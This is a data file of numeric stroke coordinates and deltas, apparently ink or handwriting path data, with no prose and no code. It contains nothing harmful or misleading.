0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0-1,-1-1 1,1 1 0,0 0 0,0-1-1,0-2-2569,0 2 2467,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,0-1 1,0 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 0-1,1 1 1,-1-1-1,2 0 1,-1 0-582,1-10-1384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25 532,'1'-2'258,"0"1"0,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,4-1 0,-5 2-154,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,0 0-1,-2 5 327,0-1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,-1 0-1,1-1 1,-1 1-1,0-1 0,-6 5 1,-14 19 854,-12 7-442,30-30-728,1 0 0,-1 0 1,1 1-1,0 0 1,-8 10-1,3-1 43,-2 0 1,1-1-1,-2 0 1,-16 14-1,13-13-117,0 2-1,-17 22 1,11-18-85,-1 2-44,9-7 63,13-15 19,-1 0 0,1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 3 1,0-3-192,3 2-1229,-2-3 1386,-1 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,31-26-10877,-20 15 7825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6 16,'0'0'3013,"10"-6"4772,-38 28-2838,-8 23-3198,3-3-994,-10 30 211,41-67-896,-1 0-1,1 0 1,0 0 0,0 0-1,1 0 1,-1 0-1,0 10 1,-5 14 210,0-11-111,4-13-115,1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,2 0 0,-2 10 0,-4 10 83,6-24-135,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 1,-1 1-1,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,1 0 0,3 9-17,1-2 1,6-2 113,21 8-1906,-31-15 1392,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 1,1-2-1,20-17-5848,-13 9 4078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55 684,'-11'18'3860,"13"-11"-3578,0-1 0,1 1 0,0-1 1,0 0-1,7 10 0,-4-11-144,0 0-1,1 0 1,-1-1 0,1 0-1,0 0 1,0 0-1,0-1 1,1 0 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0-1 1,-1-1-1,1 1 1,0-1 0,0 0-1,0-1 1,0 0-1,-1 0 1,1 0 0,13-5-1,-13 1-40,0 0-1,0 0 0,-1-1 1,13-11-1,-18 14 57,0 1 1,1-1-1,-1 0 0,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 0,1 0 1,-1-1-1,0 1 0,0 0 1,0-1-1,-1 1 0,1-5 1,-1 6-4,0 0 1,0 0 0,-1 0-1,1-1 1,-1 1 0,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,0 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,0 1 1,-1-2 0,-2 0 36,0 0 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,-7-2 1,6 2-161,0 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,1-1 0,-8 4 0,11-3-289,0 1 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 2-1,-2 4 1,3-4-962,0-1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0-1-1,-5 5 1,-3-1-1922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39 1008,'0'5'6621,"-8"8"-5061,7-12-1428,-1 1 1,1-1-1,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1-1 0,0 4 1,-9 41 1842,9-42-1839,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,1 0 0,0-1-1,4 7 1,-2-7-78,0 0-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1-1-1,-1 0 1,1-1-1,0 1 1,5 0-1,0-1-6,-1-1 1,1-1-1,-1 1 0,1-2 0,-1 1 1,1-1-1,-1-1 0,0 1 0,0-2 0,0 1 1,-1-1-1,12-7 0,-18 10-47,1-1 0,-1 1 0,0 0-1,0-1 1,0 0 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,2-4 0,8-25 67,-11 23-11,0 7-35,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1-2 0,-2-23 505,-8 17-355,11 8-169,-1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 1-1,1-1 1,-3 0 0,3 1 14,-1 0 1,1 0-1,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0-1-1,-2-1 0,-4-2 294,7 4-168,0 0-144,1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,-1 0 1,-25 1 55,18 0-48,6-1-11,0 1-1,0-1 1,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 1 1,-3 2-1,-9 5-4,1-3-6,-6 6-7,0 8 28,19-20-7,0 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1-1 1,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,1 2-13,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,0 0-1,4 5 1,-5-6-149,0-1 1,0 0 0,-1 0 0,1 0 0,1 1-1,-1-1 1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0-1,-1-1 1,1 1 0,2-2 0,17-10-8941,-10 6 5732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1 332,'10'-1'11009,"-18"16"-9014,7-13-1902,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 2 0,0 104 1162,11-78-1337,-11-28-154,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,3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68 104 684,'-5'14'3646,"4"-14"-3614,1 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,1 0 0,10 31 905,2-13-559,-12-16-348,0 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,0 0 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 0-1,4 1 0,0-1 77,0 1-38,-1-1 0,1 0 0,0-1 0,0 1-1,0-1 1,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,9-4 0,4-3-36,1-1 0,-1 0 1,-1-1-1,0-1 0,19-20 1,-35 32 45,0-1-1,0 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,-1-2-1,1 1 85,0 1-1,0-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 1 1,-1 0-1,0 0 1,-3-3-1,-14-6 889,14 8-876,1 0-1,-1 0 0,0 0 1,0 1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,-6 1 0,-5 2-91,1 1 0,-1 1-1,1 1 1,0 0 0,0 1 0,0 1-1,-28 17 1,37-20-93,0 0 1,1 1-1,0 0 0,0 1 1,0 0-1,1 0 0,-1 0 1,1 0-1,-6 11 0,10-12-374,0 1 0,0-1-1,0 0 1,1 0 0,0 1-1,0-1 1,0 0 0,1 7 0,0 7-6806,-1-13 4014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 1076,'-9'-2'10311,"7"4"-9036,2 0-1041,0 0 1,0 1 0,0-1-1,-1 0 1,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0-1,0 0 1,-2 2-1,-9 33 744,6-28-818,1 1 1,1-1-1,0 0 1,0 1-1,-2 12 1,2-10 38,0 0 0,0 0 1,-9 16-1,6-13-69,2 0 0,-1 1-1,2 0 1,0 0 0,1 0 0,1 0-1,1 0 1,0 1 0,1 21-1,0-28-108,0 1-1,1 0 1,4 20-1,-5-28-31,1-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,1-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,2 1-1,7 1-156,-10-3-143,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,-1-1-1,1 0 1,0 1-1,0-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,1-5-3469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11 231 184,'-10'0'3890,"23"1"3763,-5 0-4264,1-9-3497,3-5 151,0 2 0,0-1 1,1 2-1,26-17 0,15-22-5,-50 47-41,-1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,3-5 0,20-19 16,-23 26-14,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1-1,0-1 1,0 1 0,0 0 0,-1 0-1,3-5 1,5 9 351,-8 0-106,-9 0-206,6-2 105,2 0-119,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,8 2 183,-16-1-115,6 0 141,3-2-119,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,1 0 0,-1 0-1,0 0 1,0 1 0,1-1-1,-1 1 1,1-1-1,2-1 1,-2 3-97,-4 1-58,1-1 41,1 1-1,-1-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 0,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 0,1-1 1,0 1-1,0 0 1,0-1-1,1 1 1,-1-1-1,0 1 1,0 0-1,0-1 0,1 2 1,-3 7-14,-2-2 36,1 1 0,-1 0 0,1 0 0,1 1 0,0-1 1,-2 13-1,-3 8 103,-14 79 437,19-99-537,0 0-1,1 0 1,0 0 0,1 0 0,0 0-1,2 15 1,0 9-20,-2-33-3,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 1,0 0-1,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-5-6-1656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36 144,'0'-8'13934,"0"-19"-3528,0 27-10335,0 0 1,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,-6 3-5134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2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11 776 268,'0'0'1171,"-1"12"3109,-1-13-4982,-2-2 3462,11 1 3909,-17 3-1700,10-2-4700,1-29 615,19-1-305,-19 28-549,-1 1 1,1-1-1,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 0 0,1-1 0,-1 1 0,1 1 0,2-3 0,37-34 260,-4 4-107,-26 22-124,0 2 0,1-1 0,1 1 0,-1 1 0,1 0 0,21-10 0,91-33-23,-121 50-33,216-89-96,-195 82 101,4-1-17,46-24 1,-47 20 24,49-16 1,-46 18-43,27-11-47,48-15-263,-30 20 506,79-8-1,-22 5 130,-86 17-276,-39 4-23,0 0-1,0 0 1,0-1 0,0-1-1,0 1 1,9-4 0,5-2 1,1 2 1,0 0 0,1 2 0,29-2-1,39-5 39,-68 6-24,1 2 0,33 2 0,-33 0 97,0-1 0,33-5-1,57 0 312,-101 5-408,0 0 0,0 0 0,0 1 0,-1 1 0,15 3 0,-13-2 1,0-1 0,0 0 0,28-3 1,69-22 169,-84 16-95,0 1 0,1 2 0,56-4 1,84-3 61,-27 0 32,86 0 279,81 12 227,-307 0-690,8 7 11,3-1 7,2-1 158,0 0 0,0-1 0,0 0 0,1-2 0,-1 0-1,1 0 1,-1-1 0,31-3 0,-22 2 122,17 0-142,-39 0 27,-1 2-75,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,2 0 0,54 17 713,-47-16-513,6 2 58,-7-1 31,-11-2-205,-8 0-194,9 2 0,7-5 0,-4 5 0,6-2 0,2-1 0,0 1 0,10 9 0,-20-9 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,2 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,4 1 0,27 11 0,-1-2 0,128 20 0,-118-7 0,-32-20 0,32 19 0,33 18 0,-1 13 0,-59-48 0,-1 0 0,1-2 0,0 1 0,22 3 0,1 0 0,-37-8 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 2 0,-2-3 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,4 1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,6 5 0,30 22 0,-24-21 0,55 34 0,-61-38 0,12 10 0,10 5 0,-23-15 0,-5-1 0,-1-3 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,8 1 0,-1-2 0,0 0 0,-1 1 0,1 3 0,0-3 0,0-1 0,6-3-30,-21-2-73,-19-4-389,22 9 320,-47-15-6217,-1-1-5900,19 14 3460,17-3 4670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4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 34 544,'0'0'2612,"-11"-7"1301,12-1 2037,-2-7-1026,1 15-4892,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-2 2 1928,1 5-12,1-6-1875,0 0-1,0-1 0,-1 1 0,1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 0,0-1 1,1 1-1,-1-1 0,1 1 1,-1 0-1,0-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,-1-1-1,1 0 0,1 1 0,15 23 23,-9-12-50,55 38 643,-46-38-628,-14-11-55,-1 0 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,3 4 1,-1-2-22,1 0 1,-1-1-1,0 0 0,1 1 0,0-1 1,-1-1-1,6 4 0,21 19-69,-25-20 68,2 4 61,1-1 0,0 0 0,0 0 0,0-1 0,13 8 0,-19-14-42,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,-1 0 1,1 0 0,0 0-1,-1 0 1,1 1 0,0 2-1,11 7 17,-13-12-18,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,0-1 0,2 11-13,-48 25 23,2-9-4,14-9 10,11-4 51,-223 162 2548,196-142-2089,-19 12 226,-10-2-45,47-28-364,25-13-301,-1-1-1,1 1 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-7 0 1,8-1-29,-21-25-5785,11-10-6558,11 11 3339,0 17 4653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0 188 680,'0'0'2503,"2"-18"1800,70-67 873,-50 62-2480,-1 2-909,-20 20-1757,0-1 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1 1 0,1-1 0,1 0-1,39-11-129,-16 9 119,-24 2-8,1 1-1,0-1 1,-1 1 0,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1-1 0,-1 1 0,1 0 0,4 1 0,8 5 51,-14-6-58,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,3 3 0,-2-1-4,0-1 1,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,-2 5 0,-8 54 56,-14 29-21,20-76-37,-1-1 1,0 1 0,0-1 0,-2-1 0,1 1-1,-2-1 1,0 0 0,-18 19 0,-48 53 78,53-62-51,19-20-14,0 1 1,0 0 0,-1-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 0 0,-8 3 0,12-5 2,-1 0 0,0 0 0,0 0 1,0 1-1,1-1 0,-1 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 1,1 0-1,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 0 0,-11-3 140,12 4-154,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,7-24 14,-4 14-2,-2 9-13,-1-1 0,1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1-1,3-2 1,22-22 8,-25 23-10,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,4 1 0,7 3 2,-12-4 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,2 2 0,25 17 77,-24-18-76,0 0 0,-1 0 1,0 0-1,1 0 0,-1 1 1,0 0-1,0-1 0,0 1 1,4 6-1,-4-6 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,5-1 1,-1-2-99,-6-11-8403,0 2 2227,6 5 2643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1252,'0'-14'13137,"2"10"-10652,5 4-2471,-5 0-187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0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1544,'0'1'115,"1"-1"1,-1 0-1,0 0 0,1 0 0,-1 0 1,1-1-1,-1 1 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 0,0 0 1,0-1-1,1 1 0,-1 0 0,0-1 1,0 1-1,1 0 0,-1-1 0,0 1 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 1,0 0-26,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 1,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1-1-1,0 1 0,4 0 3276,-2 1-3150,-1-1 1,1 1-1,-1-1 1,0 1-1,1 0 1,-1 0 0,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 1-1,-1-1 1,1 0-1,0 0 1,1 2-1,8 17 698,-9-19-873,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 1 1,-1 0-1,1-1 0,-1 4 0,11 26 682,0 24 50,0-2-127,-1 1-149,-10-37-391,-1-13-94,1-1-1,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,2 4 1,-1 4-12,-2 8 14,-3-20-27,2 1-69,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1-1,1-3-1341,-2-12-7971,0 11 8303,-8-3-2302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10 186 588,'-9'-11'5874,"50"-34"-1684,-16 18-2800,-22 22-1155,0 1-1,1-1 0,0 1 1,0 0-1,0 0 0,1 1 1,8-6-1,39-41 2334,-48 48-2501,1-1-1,0 1 1,1 1 0,-1-1 0,0 1-1,0-1 1,1 2 0,-1-1 0,1 1-1,-1-1 1,0 1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,0 0-1,1 1 1,8 3 0,-6-3-39,1 0-1,-1 0 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 2 0,0-1-1,0 1 1,11 10-1,-17-14 1,0 0-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 0,-1-1 1,-1 3-1,-18 29 406,-34 28 518,38-35-504,16-25-432,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,2 2 0,2 1 32,1-1 0,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,1-1 0,10 2 0,61 16 140,-70-17-218,0 0 0,-1 1-1,1 0 1,0 1 0,-1-1-1,0 1 1,0 0-1,0 1 1,6 5 0,-11-9 55,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,-1 1-1,-27 31 965,18-22-670,4-5-172,1 0 0,-1-1 1,0 1-1,0-2 0,-11 7 0,-18 12 325,-31 7-65,52-22-397,-1 0 0,0-1 1,0-1-1,0 0 1,-1-1-1,-23 3 0,26-9-243,12-2-2540,20-9-6661,12-7 607,-19 12 5302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1640,'12'-13'7008,"-11"12"-6816,0 1 1,-1-1-1,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0 